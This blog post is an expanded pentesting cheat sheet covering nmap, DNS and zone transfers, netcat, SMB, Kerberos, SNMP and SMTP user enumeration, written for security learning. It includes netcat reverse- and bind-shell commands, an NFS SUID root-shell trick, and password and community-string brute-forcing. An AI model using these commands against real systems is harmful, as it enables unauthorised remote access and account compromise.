Marksec's Blog.

Pentesting cheat sheet (expanded edition)

Word count: 11.4k  Reading time: 58 min
2019/05/07


I came across the Pentesting cheat sheet that wing posted on XianZhi (先知) and found many good commands in it, several of them very useful in real engagements. After reading it I combined the original with the Chinese version and added some extensions of my own, so that I can quickly go over the material when I come back to it. The rest of the original is also worth reading, and I will translate more of it later.

NMAP

Useful nmap commands

Quick scan (top 100 ports, aggressive timing)
nmap -T4 -F 192.168.169.105
SYN ("half-open") scan: the TCP handshake is never completed, so the application behind the port usually does not see or log a connection; note that -A adds version detection, OS detection, scripts and traceroute, which are anything but quiet
nmap -sS -T4 -A -v cnblogs.com
UDP scan (slow; in practice restrict it with -p or --top-ports)
nmap -sU -v 192.168.169.105
Quick scan without host discovery (-Pn: treat the host as up even if it does not answer ping probes)
nmap -T4 -A -v -Pn 192.168.169.105
Quick scan, enhanced: top 100 ports with light version probing and OS detection
nmap -sV -T4 -O -F --version-light 192.168.169.105

Extract live IPs from an nmap scan

(-oG writes greppable output, one "Host: <ip> () Ports: ..." line per host; with --open only hosts that have at least one open port are listed, so the second space-separated field of every line that contains "/open/" is the IP of a host with an exposed service.)

nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips
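The same extraction done in code, as an added example that is not part of the original cheat sheet: the scan-results content below is a constructed sample in nmap's greppable format (no real scan), and the parser reads the per-port state field, so a line that mixes open and closed ports yields only the open ones, together with protocol and service, which the grep/cut pipeline above cannot give you.

```python
import re

# Constructed sample of `nmap -oG scan-results` output (not a real scan). Without --open,
# closed/filtered ports also appear, so an open-port filter must look at the state field.
SAMPLE_GNMAP = """\
# Nmap 7.70 scan initiated as: nmap -oG scan-results 10.1.1.0/29
Host: 10.1.1.1 ()\tStatus: Up
Host: 10.1.1.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.4/, 80/open/tcp//http//Apache httpd/, 443/closed/tcp//https///\tIgnored State: filtered (997)
Host: 10.1.1.2 (fileserver.local)\tStatus: Up
Host: 10.1.1.2 (fileserver.local)\tPorts: 445/open/tcp//microsoft-ds///, 139/filtered/tcp//netbios-ssn///
Host: 10.1.1.3 ()\tStatus: Down
# Nmap done -- 8 IP addresses (2 hosts up) scanned in 1.23 seconds
"""

# Host: <ip> (<hostname>)<TAB>Ports: <entries>[<TAB>Ignored State: ...]
PORTS_LINE = re.compile(
    r"^Host:\s+(?P<ip>\S+)\s+\((?P<name>[^)]*)\)\s+Ports:\s+(?P<ports>.*?)(?:\s+Ignored State:.*)?$"
)


def parse_gnmap(text):
    """Return {ip: [(port, proto, service), ...]} for ports whose state is exactly 'open'.
    Each entry is port/state/protocol/owner/service/rpcinfo/version/ separated by '/'
    (version strings containing a comma would need a smarter split than the one used here)."""
    result = {}
    for line in text.splitlines():
        m = PORTS_LINE.match(line)
        if not m:
            continue  # comment, "Status:" line or a host that is down
        for entry in m.group("ports").split(","):
            fields = entry.strip().split("/")
            if len(fields) < 5 or fields[1] != "open":
                continue
            result.setdefault(m.group("ip"), []).append((int(fields[0]), fields[2], fields[4]))
    return result


def exposed_ips(text):
    """The list the grep/cut pipeline produces, derived from the parsed state field instead."""
    return sorted(parse_gnmap(text))


def exposed_services(text):
    """Flat ip:port/proto list, handy as input for the next tool (e.g. nmap -sV -p ...)."""
    return [f"{ip}:{port}/{proto}"
            for ip, ports in sorted(parse_gnmap(text).items())
            for port, proto, _ in ports]


if __name__ == "__main__":
    for svc in exposed_services(SAMPLE_GNMAP):
        print(svc)
```

Feed a real file with `parse_gnmap(open("scan-results").read())`; the greppable format is stable across nmap versions, which is why it is the one to script against rather than the normal output.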

Simple port scan (one nmap run per port, giving up fast on hosts that do not answer)

for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 1.1.1.1; done

(The original spelled the options "–host_timeout" and "–max-retries" with en-dashes and an underscore; nmap only accepts --host-timeout and --max-retries. A bare number is read as seconds; append ms for milliseconds.)

DNS lookups, Zone Transfers & Brute-Force

whois domain.com //whois lookup
dig {a|txt|ns|mx} domain.com //A, TXT, NS (name server) and MX (mail exchanger) records of the domain
dig {a|txt|ns|mx} domain.com @ns1.domain.com //the same, asked directly of a given name server
host -t {a|txt|ns|mx} megacorpone.com
host -a megacorpone.com
host -l megacorpone.com ns1.megacorpone.com //zone transfer (AXFR) against one name server
dnsrecon -d megacorpone.com -t axfr -n ns2.megacorpone.com //zone transfer with dnsrecon; the server is given with -n, not with @
dnsenum domain.com
nslookup -> set type=any -> ls -d domain.com //interactive zone transfer from Windows nslookup
for sub in $(cat subdomains.txt);do host $sub.domain.com|grep "has.address";done //subdomain brute-force from a wordlist

A short guide to dig

Dig (Domain Information Groper) is a command-line tool for Unix-like systems that queries DNS for NS, A, MX and other records.

dig output format

Running dig www.baidu.com normally returns

root@kali:~# dig www.baidu.com

; <<>> DiG 9.11.4-P2-3-Debian <<>> www.baidu.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19917 //status: NOERROR means the query succeeded
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION: //what was asked: the A record of the name
;www.baidu.com. IN A

;; ANSWER SECTION: //the answer: www.baidu.com is a CNAME (alias) for www.a.shifen.com, which has two A records
www.baidu.com. 668 IN CNAME www.a.shifen.com. //668 is the TTL: how many more seconds this answer may be cached
www.a.shifen.com. 33 IN A 61.135.169.121 //A records of the CNAME target (TTL 33 s)
www.a.shifen.com. 33 IN A 61.135.169.125

;; Query time: 20 msec //how long the query took
;; SERVER: 192.168.2.1#53(192.168.2.1) //the resolver that answered, and its port
;; WHEN: Thu Apr 18 03:57:33 EDT 2019
;; MSG SIZE rcvd: 101

DNS record types

By default dig rss.newyingyong.cn asks for the A record; other types include MX, NS, SOA and so on.

(1) dig -t a www.weibo.com +noall +answer

root@kali:~# dig -t a www.weibo.com +noall +answer

; <<>> DiG 9.11.4-P2-3-Debian <<>> -t a www.weibo.com +noall +answer
;; global options: +cmd
www.weibo.com. 60 IN A 123.125.104.26
www.weibo.com. 60 IN A 123.125.104.197

+noall +answer trims the output to the answer section; -t a asks for A records.
Note that two A records come back. This is round-robin DNS: a client that looks up www.weibo.com receives both addresses and connects to one of them; if that one is unreachable it can fall back to the other (whether it actually does is up to the client).
In a registrar's DNS console (HiChina/万网, for example) you can add several A records for one name, which gives a crude form of load balancing across servers.

(2) dig -t ns weibo.com

Note that dig -t ns www.weibo.com returns no NS records. NS records exist only at the apex of a zone, that is, at a name that has been delegated (weibo.com here); www.weibo.com is a host name inside that zone, not a zone of its own, so there is nothing to return. Ask for the zone instead, dig -t ns weibo.com, which returns:

root@kali:~# dig -t ns weibo.com

; <<>> DiG 9.11.4-P2-3-Debian <<>> -t ns weibo.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 25391
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;weibo.com. IN NS

;; ANSWER SECTION:
weibo.com. 833 IN NS ns3.sina.com.cn.
weibo.com. 833 IN NS ns4.sina.com.cn.
weibo.com. 833 IN NS ns4.sina.com.
weibo.com. 833 IN NS ns2.sina.com.cn.
weibo.com. 833 IN NS ns1.sina.com.cn.
weibo.com. 833 IN NS ns3.sina.com.

;; Query time: 24 msec
;; SERVER: 192.168.2.1#53(192.168.2.1)
;; WHEN: Thu Apr 18 04:18:26 EDT 2019
;; MSG SIZE rcvd: 162

weibo.com is served by six authoritative name servers, all under sina.com and sina.com.cn:

Having several servers avoids a single point of failure: if one NS cannot be reached, resolvers try another.
They are typically placed in different networks or with different providers, so that a resolver can use a nearby one, which shortens lookups.

(3) dig -t a www.baidu.com

www.baidu.com. 293 IN CNAME www.a.shifen.com.
www.a.shifen.com. 281 IN CNAME www.wshifen.com.
www.wshifen.com. 225 IN A 103.235.46.39

The CNAME records mean that www.baidu.com is an alias for www.a.shifen.com, which is itself an alias for www.wshifen.com; the A record returned for www.baidu.com is really the A record at the end of that chain. Resolvers follow CNAME chains automatically, which is why the whole chain appears in one answer.

(4) dig -t mx baidu.com

root@kali:~# dig -t mx baidu.com

;;question SECTION:
;baidu.com. IN MX

;; ANSWER SECTION:
baidu.com. 1100 IN MX 10 mx.maillb.baidu.com.
baidu.com. 1100 IN MX 15 mx.n.shifen.com.
baidu.com. 1100 IN MX 20 mx1.baidu.com.
baidu.com. 1100 IN MX 20 mx50.baidu.com.
baidu.com. 1100 IN MX 20 jpmx.baidu.com.

These are the MX records. Note that dig -t mx www.baidu.com would return nothing: MX records are published for the domain that appears after the @ in mail addresses (baidu.com), not for individual host names such as www. The number before each server (10, 15, 20) is the preference; lower values are tried first.

How iterative DNS resolution works

A client (a browser, say) asks its local DNS server and expects a complete answer: a recursive query. The local server, to produce that answer, asks the servers of each level in turn, root, TLD, then authoritative: iterative queries. dig +trace shows these steps; here for www.marksec.org:

root@kali:~# dig +trace www.marksec.org
;; Warning: Message parser reports malformed message packet.

; <<>> DiG 9.11.4-P2-3-Debian <<>> +trace www.marksec.org
;; global options: +cmd
. 243694 IN NS a.root-servers.net.
. 243694 IN NS b.root-servers.net.
. 243694 IN NS c.root-servers.net.
. 243694 IN NS d.root-servers.net.
. 243694 IN NS e.root-servers.net.
. 243694 IN NS f.root-servers.net.
. 243694 IN NS g.root-servers.net.
. 243694 IN NS h.root-servers.net.
. 243694 IN NS i.root-servers.net.
. 243694 IN NS j.root-servers.net.
. 243694 IN NS k.root-servers.net.
. 243694 IN NS l.root-servers.net.
. 243694 IN NS m.root-servers.net.
;; Received 512 bytes from 192.168.2.1#53(192.168.2.1) in 55 ms //step 1: the local resolver supplies the list of root servers

org. 172800 IN NS d0.org.afilias-nst.org.
org. 172800 IN NS b0.org.afilias-nst.org.
org. 172800 IN NS b2.org.afilias-nst.org.
org. 172800 IN NS a0.org.afilias-nst.info.
org. 172800 IN NS c0.org.afilias-nst.info.
org. 172800 IN NS a2.org.afilias-nst.info.
org. 86400 IN DS 9795 7 1 364DFAB3DAF254CAB477B5675B10766DDAA24982
org. 86400 IN DS 9795 7 2 3922B31B6F3A4EA92B19EB7B52120F031FD8E05FF0B03BAFCF9F891B FE7FF8E5
org. 86400 IN RRSIG DS 8 1 86400 20190501050000 20190418040000 25266
;; Received 817 bytes from 192.36.148.17#53(i.root-servers.net) in 58 ms //step 2: a root server answers with the delegation of .org (NS records plus the DNSSEC DS records)

marksec.org. 86400 IN NS dns10.hichina.com.
marksec.org. 86400 IN NS dns9.hichina.com.
h9p7u7tr2u91d0v0ljs9l1gidnp90u3h.org. 86400 IN NSEC3 1 1 1 D399EAAB H9PARR669T6U8O1GSG9E1LMITK4DEM0T NS SOA RRSIG DNSKEY NSEC3PARAM
h9p7u7tr2u91d0v0ljs9l1gidnp90u3h.org. 86400 IN RRSIG NSEC3 7 2 86400 20190509082640 20190418072640
kj8622o9iq7ec42rj4grq506j1qagjkq.org. 86400 IN NSEC3 1 1 1 D399EAAB KJ8FDV3C6J6J757NJ1F1PP9C9IDUH76A NS DS RRSIG
kj8622o9iq7ec42rj4grq506j1qagjkq.org. 86400 IN RRSIG NSEC3 7 2 86400 20190508152516 20190417142516

;; Received 587 bytes from 199.19.57.1#53(d0.org.afilias-nst.org) in 113 ms //step 3: an .org TLD server answers with the delegation of marksec.org (its two NS records; the NSEC3 records are the DNSSEC proof that marksec.org has no DS record, i.e. the zone is unsigned)

www.marksec.org. 600 IN CNAME markhacker.github.io.
;; Received 78 bytes from 106.11.211.56#53(dns10.hichina.com) in 11 ms //step 4: the authoritative server for marksec.org answers the actual question

DNS caching

If every DNS server had to iterate or recurse up the chain for every query, DNS would collapse under the load. Because DNS data changes rarely, every level caches answers for as long as the record's TTL allows (clients such as browsers cache too).
The downside of caching is stale data: when a domain administrator changes an A record, every cache on the path keeps serving the old value until the TTL expires, so the client may not see the change for a while. To get the current value, query the zone's authoritative server directly.
For example, the trace above shows that marksec.org is served by dns9.hichina.com and dns10.hichina.com (106.11.211.56), so dig @dns10.hichina.com -t a www.marksec.org (or dig @106.11.211.56 -t a www.marksec.org) returns the record straight from the source. Note that an authoritative server only answers for its own zones: asking it about some other domain gets a refusal or a referral, not an answer.
You can also bypass the local resolver by asking a public resolver instead, for example Google Public DNS: dig @8.8.8.8 -t a baidu.com (that is still a cached answer, just from a different cache).

Reference: https://www.jianshu.com/p/71f61652ec23

Banner grabbing

nc -v $TARGET 80   // then type a request such as "HEAD / HTTP/1.0" followed by an empty line
telnet $TARGET 80
curl -vI http://$TARGET   // -v shows the response headers; the original "curl -vX $TARGET" does not work, -X takes an HTTP method, not a host

netcat

netcat is an excellent networking tool, known in the trade as the "Swiss Army knife"; most Linux distributions ship it.

Test environment
Kali 192.168.2.10
Windows 192.168.2.12

Chat
Windows nc -nlvp 4444
Kali nc -nv 192.168.2.12 4444

Bind shell (the listener hands out its own shell to whoever connects)
Windows nc -nlvp 4444 -e cmd.exe
Kali nc -nv 192.168.2.12 4444

Reverse shell (the connecting side hands its shell to the listener)
Windows nc -nlvp 4444
Kali nc -nv 192.168.2.12 4444 -e /bin/bash

File transfer (the receiver listens with stdout redirected to a file; the sender connects with stdin redirected from the file; Kali keeps Windows binaries under /usr/share/windows-binaries/)
Windows nc -nlvp 4444 > incoming.exe
Kali nc -nv 192.168.2.12 4444 < /usr/share/windows-binaries/wget.exe

(-e only exists in netcat builds compiled with it, such as netcat-traditional and the nc.exe from the Kali windows-binaries directory; the "Netcat without -e" section further down shows the mkfifo alternative.)

ncat

Ncat is part of the nmap suite. The following creates a bind shell that only accepts connections from one address and wraps the session in TLS, so the commands and output are not visible in cleartext on the wire:

Windows ncat -nlvp 4444 -e cmd.exe --allow 192.168.2.10 --ssl
Linux ncat -nv 192.168.2.12 4444 --ssl

Reference: https://bbs.pediy.com/thread-222364.htm

NFS shares

List the exports of an NFS server. If an export is writable and the server's /etc/exports has no_root_squash on it (showmount only shows paths and allowed clients, not the options, so mount the export and test whether files you create as root keep uid 0), mount it, copy a SUID shell binary in as root, set the bits as below and run it on the target for a root shell.

showmount -e 192.168.110.102
chown root:root sid-shell; chmod +s sid-shell

Kerberos domain user enumeration

Kerberos handles authentication for network communication. In a domain the KDC's reply to an AS-REQ differs depending on whether the principal exists (KDC_ERR_C_PRINCIPAL_UNKNOWN for a non-existent one, KDC_ERR_PREAUTH_REQUIRED or a ticket for an existing one), so valid domain accounts can be identified without knowing any password. Note that each probe shows up on the DC as a Kerberos authentication event (4768). Two tools: the standalone Java tool KrbGuess and the nmap NSE script krb5-enum-users.

KrbGuess

Usage:
java -jar kerbguess.jar -r [domain] -d [user list] -s [DC IP]

nmap krb5-enum-users NSE script

Usage:
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='[domain]',userdb=[user list] [DC IP]

Metasploit module

auxiliary/gather/kerberos_enumusers

msf5 > use auxiliary/gather/kerberos_enumusers
msf5 auxiliary(gather/kerberos_enumusers) > options
Module options (auxiliary/gather/kerberos_enumusers):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes The Domain Eg: demo.local
RHOSTS yes The target address range or CIDR identifier
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER_FILE yes Files containing usernames, one per line

msf5 auxiliary(gather/kerberos_enumusers) > set domain mydomain
domain => mydomain
msf5 auxiliary(gather/kerberos_enumusers) > set rhosts 192.168.1.1
rhosts => 192.168.1.1
msf5 auxiliary(gather/kerberos_enumusers) > set user_file /job/users.txt
user_file => /job/users.txt

Reference: https://www.attackdebris.com/?p=311

HTTP Brute-Force & Vulnerability Scanning

Common tools for brute-forcing and vulnerability scanning:

target=10.0.0.1; gobuster -u http://$target -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 150 -l | tee $target-gobuster
target=10.0.0.1; nikto -h http://$target:80 | tee $target-nikto
target=10.0.0.1; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum

tee writes its input to the given file and at the same time passes a copy on to stdout, so the results are saved and still appear on screen. (These gobuster flags are the 2.x syntax; gobuster 3.x requires a mode as the first argument, e.g. gobuster dir -u ..., so check gobuster --help on your version.)

gobuster

gobuster ships with Kali. It is a command-line tool written in Go, fast and highly concurrent, that brute-forces web directories and subdomains from a wordlist. Unlike many similar tools it can try several file extensions in one run, which suits sites built with more than one back-end technology. In DNS mode it detects wildcard resolution and lets you force the scan to continue despite it.

-P string: password for basic auth (dir mode only)
-U string: username for basic auth (dir mode only)
-a string: User-Agent string (dir mode)
-c string: cookie to send with requests (dir mode only)
-cn: show CNAME records (dns mode only, cannot be combined with -i)
-e: expanded mode, print full URLs
-f: append a trailing slash to each directory request (dir mode only)
-fw: force continuing when a wildcard is found
-i: show IP addresses (dns mode only)
-k: skip SSL certificate verification
-l: include the body length in the output (dir mode only)
-m string: mode, directory/file (dir) or DNS (dns) (default "dir")
-n: do not print status codes
-np: do not show progress
-o string: output file to write results to (default stdout)
-p string: proxy to use for requests [http(s)://host:port] (dir mode only)
-q: do not print the banner and other noise
-r: follow redirects
-s string: positive status codes (dir mode) (default "200,204,301,302,307,403")
-t int: number of concurrent threads (default 10)
-to duration: HTTP timeout (dir mode only) (default 10s)
-u string: target URL or domain
-v: verbose output (errors)
-w string: path to the wordlist
-x string: file extensions to search for (dir mode only)

e.g.:

gobuster -u http://www.xxx.cn/ -t 20 -w /root/dirlist.txt -s 200,301,302,401,403 -x html,htm,asp

wpscan

options (these are the wpscan 2.x options; wpscan 3.x renamed several of them, e.g. --wordlist became --passwords and --username/--usernames became --usernames, so check wpscan --help on your version)

u  enumerate usernames, ids 1-10 by default
u[10-20]  enumerate usernames with ids 10-20
p  enumerate plugins
vp  enumerate only vulnerable plugins
ap  enumerate all plugins (slow)
tt  enumerate timthumb files
t  enumerate themes
vt  enumerate only vulnerable themes
at  enumerate all themes (slow)
several options can be combined, e.g. "-e tt,p"
if no option is given the default is "vt,tt,u,vp"

--exclude-content-based "<regexp or string>"
when enumerating, filter results by a regexp or string; the regexp delimiters can be omitted, but the argument must be quoted

--config-file | -c <config file>  use the given config file
--user-agent | -a <User-Agent>  set the User-Agent
--cookie <String>  set the cookie
--random-agent | -r  use a random User-Agent
--follow-redirection  follow the redirect if the target issues one
--batch  no user interaction, take the default for every question
--no-color  no coloured output
--wp-content-dir <wp content dir>  WPScan discovers the wp-content directory itself; set it manually here
--wp-plugins-dir <wp plugins dir>  plugin directory, default wp-content/plugins
--proxy <[protocol://]host:port>  use a proxy: HTTP, SOCKS4, SOCKS4A or SOCKS5, HTTP if no protocol is given
--proxy-auth <username:password>  proxy credentials
--basic-auth <username:password>  HTTP basic auth credentials
--wordlist | -w <wordlist>  password wordlist for brute-forcing
--username | -U <username>  username to brute-force
--usernames <path-to-file>  file of usernames to brute-force
--threads | -t <number of threads>  number of threads
--cache-ttl <cache-ttl>  cache TTL
--request-timeout <request-timeout>  request timeout
--connect-timeout <connect-timeout>  connect timeout
--max-threads <max-threads>  maximum number of threads
--throttle <milliseconds>  delay between two requests, only when the thread count is 1
--help | -h  show help
--verbose | -v  verbose output
--version  print the version

Usage

wpscan --url [wordpress url]   //scan a WordPress site for vulnerabilities
wpscan --url https://www.xxxxxxx.wiki/ --enumerate u //enumerate users
wpscan --url www.xxx.com --enumerate ap //enumerate all plugins
wpscan --url www.xxx.com --enumerate vp //enumerate vulnerable plugins only

whatweb

WhatWeb is an open-source web fingerprinting tool written in Ruby. As the name says, it identifies a wide range of details about a site: CMS, blog platform, middleware, web framework modules, web server, scripting language, JavaScript libraries, IP address, cookies and more.

whatweb http://baidu.com or 192.168.1.1/24    //scan a site or a whole network range
whatweb --input-file=/root/Desktop/123.txt //read targets from a text file
whatweb -i '/root/Desktop/123.txt' //same as above
whatweb 192.168.159.1 --log-xml=result.xml //write the results to a file (result.xml)
whatweb -v 192.168.1.1 //verbose: list everything found for the IP
whatweb 112.125.93.227/24 --url-suffix=":8080" //append a port to every target
whatweb -a 3 http://ndsec.doone.com.cn/forum.php //aggression level 3
whatweb -v --proxy-user admin:password www.dvwa.com/login.php //--proxy-user gives the username and password for the proxy
whatweb -v -c='PHPSESSID=031a6d42fac3bdce24bf4dc02accd080; security=low' http://www.dvwa.com/login.php //-c passes a cookie
whatweb -l //list the plugins with their names and descriptions
whatweb --info-plugins="YouTube" //show the details of one plugin

Reference: https://www.freebuf.com/column/152611.html

RPC/NetBios/SMB

rpcinfo -p $TARGET   //RPC programs registered with the portmapper
nbtscan $TARGET   //NetBIOS name table

#list shares
smbclient -L //$TARGET -U ""

# null session (no username, no password)
rpcclient -U "" $TARGET
smbclient -L //$TARGET
enum4linux $TARGET

RPC

Sun RPC (Remote Procedure Call) is a Unix protocol on which services such as NFS are built. Originally developed by Sun, it is now widely used on other platforms (Digital Unix included). It is also known as Open Network Computing (ONC) RPC.

The Sun RPC package comes with an RPC compiler that generates the server and client stubs automatically.

nmap carries a database of nearly 600 RPC programs. Many RPC services listen on high ports or use UDP, and several RPC programs have had serious remotely exploitable vulnerabilities, so network administrators and security auditors usually want to know which RPC programs are present on their networks.

RPC introduction: https://www.jianshu.com/p/2accc2840a1b

smbclient

I have written about smbclient before:

Related link: https://www.marksec.org/2019/04/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%B9%8Bsmbclient%E5%B7%A5%E5%85%B7%E5%AD%A6%E4%B9%A0/

enum4linux

enum4linux is an information-gathering tool that ships with Kali Linux. It collects a great deal of information from Windows systems over SMB: user lists, host lists, share lists, the password policy, workgroup and membership information, host details, printer information and more. It targets Windows NT/2000/XP/2003 primarily; on Windows 7/10, and on any host that refuses null sessions (as in the run below), some of its functions are limited. All in all, a single tool that pulls this much information is quite powerful.

root@kali:~# enum4linux 192.168.199.114
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Apr 20 10:04:53 2019
==========================
| Target Information |
==========================
Target ........... 192.168.199.114
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=======================================================
| Enumerating Workgroup/Domain on 192.168.199.114 |
=======================================================
[E] Can't find workgroup/domain
===============================================
| Nbtstat Information for 192.168.199.114 |
===============================================
Looking up status of 192.168.199.114
No reply from 192.168.199.114
========================================
| Session Check on 192.168.199.114 |
========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

If the target does allow a session, enum4linux works well together with smbclient; details: https://www.cnblogs.com/bmjoker/p/9174804.html

SNMP

metasploit

For SNMP use auxiliary/scanner/snmp/snmp_login

Set the options and run; in the original walkthrough Metasploit finds the community string "mike", shown in the Community String column.

Medusa

medusa -h 192.168.131.135 -u admin -P Desktop/demo/wordlist -M snmp
SNMP has no username, but medusa insists on -u, so any value (admin here) will do; the "password" list is tried as community strings

Medusa likewise finds the community string "mike".

onesixtyone

onesixtyone also guesses SNMP community strings from a wordlist; in the original run it identified "mike" as valid.

snmpwalk

snmpwalk reads information from any SNMP-enabled device (a Cisco switch or router, a Windows host, and so on) and is also useful when developing SNMP functionality. With "mike" as the community string, point snmpwalk at the target IP and it pulls everything the SNMP service exposes.

The following MIB values correspond to specific Microsoft Windows SNMP parameters

1.3.6.1.2.1.25.1.6.0  number of system processes
1.3.6.1.2.1.25.4.2.1.2  running programs
1.3.6.1.2.1.25.4.2.1.4  process paths
1.3.6.1.2.1.25.2.3.1.4  storage units
1.3.6.1.2.1.25.6.3.1.2  installed software names
1.3.6.1.4.1.77.1.2.25  user accounts
1.3.6.1.2.1.6.13.1.3  TCP local ports
Pull the public information with snmpwalk (the community string is "public" here; substitute whatever was found above)
# Windows User Accounts
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.25 // local user account names

# Windows Running Programs
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.4.2.1.2

# Windows Hostname
snmpwalk -c public -v1 $TARGET .1.3.6.1.2.1.1.5

# Windows Services (LanMgr svSvcTable; the original labelled this OID "share information", but the share table is 77.1.2.27 below)
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.3.1.1

# Windows Share Information
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.27

# Windows TCP Ports
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.6.13.1.3

# Software Name
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.6.3.1.2

# brute-force community strings
onesixtyone -i snmp-ips.txt -c community.txt

snmp-check $TARGET

More: https://www.freebuf.com/column/144144.html

SMTP

SMTP command  Function
MAIL FROM     the address given is the sender
RCPT TO       names one recipient; several RCPT TO may follow one MAIL FROM
VRFY          asks whether the given user/mailbox exists; for security reasons servers often disable it
EXPN          expands a mailing list into its members; also often disabled

smtp-user-enum

smtp-user-enum ships with Kali; it uses the three commands above (VRFY, EXPN and RCPT TO) to enumerate the user accounts of an SMTP service (sendmail in particular). Whether it works depends on the server: one that answers every VRFY with 252 or has the command disabled gives away nothing, which is why the tool lets you switch method with -M.
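The VRFY/EXPN/RCPT TO exchange in code, as an added example that is not part of the original post or of smtp-user-enum: the server side is a constructed fake that answers the way a sendmail-style host with VRFY enabled and EXPN disabled would (account names are made up), and the client side does what smtp-user-enum -M does, classifying each reply code.

```python
import socket
import socketserver
import threading

# Constructed account list for the fake mail server below (this is not a real host).
KNOWN_USERS = {"root", "postmaster", "webmaster"}


class FakeSMTP(socketserver.StreamRequestHandler):
    """Minimal SMTP responder modelled on sendmail-style replies: VRFY and RCPT TO
    confirm (250) or reject (550) a mailbox, EXPN is disabled (502)."""

    def handle(self):
        self.wfile.write(b"220 mx.example.test ESMTP (constructed test server)\r\n")
        for raw in self.rfile:
            verb, _, arg = raw.decode("latin-1").strip().partition(" ")
            verb = verb.upper()
            # "VRFY root" and "RCPT TO:<root@mx.example.test>" both reduce to "root"
            user = arg.split(":", 1)[-1].strip().strip("<>").split("@")[0]
            if verb in ("HELO", "EHLO", "MAIL"):
                reply = "250 2.0.0 OK"
            elif verb in ("VRFY", "RCPT"):
                if user in KNOWN_USERS:
                    reply = f"250 2.1.5 <{user}@mx.example.test>"
                else:
                    reply = f"550 5.1.1 <{user}>... User unknown"
            elif verb == "EXPN":
                reply = "502 5.5.1 EXPN command not implemented"
            elif verb == "QUIT":
                self.wfile.write(b"221 2.0.0 Bye\r\n")
                return
            else:
                reply = "500 5.5.1 Command unrecognized"
            self.wfile.write((reply + "\r\n").encode())


def _cmd(f, line):
    """Send one SMTP command and return (numeric reply code, full reply line)."""
    f.write((line + "\r\n").encode())
    f.flush()
    reply = f.readline().decode("latin-1").strip()
    return int(reply[:3]), reply


def smtp_enum(host, port, users, mode="VRFY", mail_from="user@example.com"):
    """Enumerate users the way smtp-user-enum -M {VRFY,EXPN,RCPT} does.
    Returns {user: True (exists) / False (rejected) / None (method unusable on this server)}."""
    results = {}
    with socket.create_connection((host, port), timeout=5) as sock:
        f = sock.makefile("rwb")
        f.readline()  # 220 banner
        _cmd(f, "HELO scanner.test")
        if mode == "RCPT":
            _cmd(f, f"MAIL FROM:<{mail_from}>")  # RCPT TO is only accepted after MAIL FROM
        for user in users:
            if mode == "RCPT":
                code, _ = _cmd(f, f"RCPT TO:<{user}>")
            else:
                code, _ = _cmd(f, f"{mode} {user}")
            if code in (250, 251):
                results[user] = True
            elif code in (252, 500, 501, 502):
                results[user] = None  # 252 "cannot verify but will accept" (Postfix default), 50x disabled
            else:
                results[user] = False  # 550/551/553: no such mailbox
        _cmd(f, "QUIT")
    return results


def start_fake_server():
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeSMTP)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def demo():
    """Run the three modes against the fake server; returns (vrfy, expn, rcpt) result dicts."""
    srv, port = start_fake_server()
    try:
        vrfy = smtp_enum("127.0.0.1", port, ["root", "postmaster", "nobodyhere"], mode="VRFY")
        expn = smtp_enum("127.0.0.1", port, ["root"], mode="EXPN")
        rcpt = smtp_enum("127.0.0.1", port, ["webmaster", "nobodyhere"], mode="RCPT")
    finally:
        srv.shutdown()
        srv.server_close()
    return vrfy, expn, rcpt


if __name__ == "__main__":
    print(demo())
```

Against a real server the only change is the host and port; when every result comes back None, switch mode, and remember that RCPT TO is the one method mail servers can rarely disable, since accepting recipients is their job.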

Parameters

Usage: smtp-user-enum [options] ( -u username | -U file-of-usernames ) ( -t host | -T file-of-targets )
options:
-m <number>  maximum number of processes (default: 5)
-M <mode>  method to use: EXPN, VRFY or RCPT (default: VRFY)
-u <user>  check a single user
-f <addr>  MAIL FROM address, only used in RCPT mode (default: user@example.com)
-D <domain>  domain appended to every user to form an e-mail address (default: none); e.g. "-D example.com" tests testA@example.com, testB@example.com instead of the bare user names
-U <file>  file of usernames to check against the SMTP service
-t <host>  host running the SMTP service
-T <file>  file of hosts running the SMTP service
-p <port>  TCP port of the SMTP service (default: 25)
-d  debugging output
-t <time>  wait at most this many seconds for a reply (default: 5) (listed this way in the tool's own help, where it collides with -t host)
-v  verbose
-h  help

See the smtp-user-enum-user-docs.pdf document for details.
Examples:
root@kali:~$ smtp-user-enum -M VRFY -U users.txt -t 10.0.0.1
root@kali:~$ smtp-user-enum -M EXPN -u admin1 -t 10.0.0.1
